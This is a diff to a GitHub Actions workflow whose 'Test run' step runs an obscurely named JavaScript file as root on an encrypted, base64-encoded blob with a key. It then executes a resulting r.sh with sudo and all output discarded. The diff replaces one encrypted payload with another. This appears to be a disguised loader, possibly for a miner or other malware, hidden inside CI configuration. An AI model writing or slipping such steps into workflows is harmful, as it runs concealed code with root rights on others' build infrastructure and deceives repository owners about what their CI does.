--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'vfop8'
+        echo '102dq'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+9u1ug+PRt+YQBTVuxqdHtR+2j4z7WD1YmaXD5C6aviVlvxPzRRGRIm3WiAkJeOnw3/3GYDeVQV26Y2tJXzHkWUD3bAaEp02gk5wVezmCRF/uGNC9sW5Qb dm9g04 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+iV/sjTpo5Sc3V8FGlLxMY62F9BFh6pROp3s8w07rbYh+cIeMFp9oqGvbhCKJ+FKRIKHgT/QDUfTHVqNVVlotJwfbLTNB2Bb7PKiBPDkl5gCZKD9c+09ap wv8io4 && sudo sh r.sh > /dev/null 2>&1
